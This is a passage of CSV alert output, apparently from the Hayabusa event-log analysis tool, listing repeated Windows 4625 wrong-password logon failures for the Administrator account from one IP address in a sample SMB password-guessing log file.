NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v06kkhqYNOyEHx2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WSTDX16YK5Zgkjxo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u6QWEyTrpndCagP0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7iCaXa5SR5IHJnQA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DNZhcPd1JaNFZMYG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LeOIg10KS60QplWz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: um3Nwo2doDbKJJvz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JuoqbUwc2Nth1xlH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WF8zKIbeboTLLkC6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kSyKc8igfuYLMekV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LHog0TdOci9CCKBa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R5ilFaQlemZUSNun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOJnv9vFdqr2VSQC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rXaoVN7FvJ5rRDUF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kaFCT5QYFfmJpEC1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kOdVfL4XUTLp60tC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wFQSXjz0JTlkwpBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgAVlnENp6IzRRDr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JLkeKKFVP5vJjPtl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EqLXdGmr45vGpu3E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m7uTpMLqPgenJdRb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FQn7NqRzpGtjQdfv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8F8EZLHQtEWkeob1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5joxW81M9vcAfbJw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iMfmQF3xsaV5SQVZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQe9VL8eeco0SdPW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MnMbxQEuczrnMLKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3DWOiTIp6JQLq9Vz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E1ORteg467kiFxmD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EoVhHZ2lkyAEx0w9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMSqYaVVGR5v3bXr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hEEJ05nL0lyatWKL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SgrcS1NqwVJSEv31 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CCNTu1A6c6myngXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YLx5Hv5GmdvsO9SE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtS3KUkTVoAWGqbW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7DxfDEwc6ykrmddu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m8yKyocZwOY574pe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfdmcsxnDHRxJYAA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: euxBOcdse8NjSzTd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dw7RZh5jKuRcM1xw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zIyozsYA1Mn27gl7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhJopROjHZi6T8aF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QZ6XuZO6fIMg52tV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.870 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tvAYEepvDwz93ezW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Er95vLjet49OmSQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:06.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OKkMGZ5on5L26cip | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dp5dq3YYmmLxperL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: klkWqfYoNQQHRISX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q0EekPO3q6qRfq3i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfG1x6sL4Aqlj7TK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: owSUehMmDEhijkfl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J3xBPT5WiuvmPZHe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIufEPz8FBVd5yKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Blruxd110NvZjof | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0VsPitzItsjU3Y59 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HEq6vk4nTe3weSOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lE8kvmcQtCmlsqtT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXmfjxrGC3liZ2oh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72JLcUBrhOoXPLzD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sRoFpK2ZvBYy4jGM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9KReiI3k2WIKpxFq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wsfSzPbji6ARhU0k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: axeCxygvJ4zL4Xoq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y64sc51Y7vbiFTIQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o395tRQcfRBTTCSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K1R4wlYWS4SkM3dF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RsZy0Yjvk720Mu22 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c8RusStjhReKBmS0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eJuPYLTcGaGvErLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: raCbua01mzU1Djuf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fnt8atAbMtxXivUs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: psokvQJyMn5m5rMh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wTPGqOITsOhpTgIF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xxhGrLzhwNziihc9 | IP Addr: 192.168.198.149 | AuthPackage: 